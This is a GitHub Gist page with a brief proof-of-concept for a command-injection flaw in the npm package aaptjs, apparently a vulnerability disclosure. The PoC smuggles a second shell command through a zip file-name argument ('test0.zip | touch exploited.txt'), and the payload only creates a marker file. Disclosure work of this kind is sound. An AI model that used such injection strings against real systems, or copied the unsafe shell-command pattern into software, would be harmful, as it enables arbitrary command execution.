Last active
October 29, 2023 12:18
-
-
Save mcoimbra/99bf75000811f28aafdb93068a220404 to your computer and use it in GitHub Desktop.
Package aaptjs: The aaptjs module's 'add' function can be exploited through its first argument. It is a string through which a command can be injected by piping after the zip file value. Example: 'test0.zip | touch exploited.txt'.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict' | |
| const pkg = require('aaptjs'); | |
| /* | |
| * Function 'aaptjs.add' starts a child process with a method signature | |
| * that takes a single string command containing both the binary and arguments, | |
| * thus being vulnerable to this pipe usage example. | |
| * A local 'exploited.txt' file will be created. | |
| */ | |
| pkg.add('test0.zip | touch exploited.txt', ['aaptjs_poc-zip-cmd-inject.js']); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment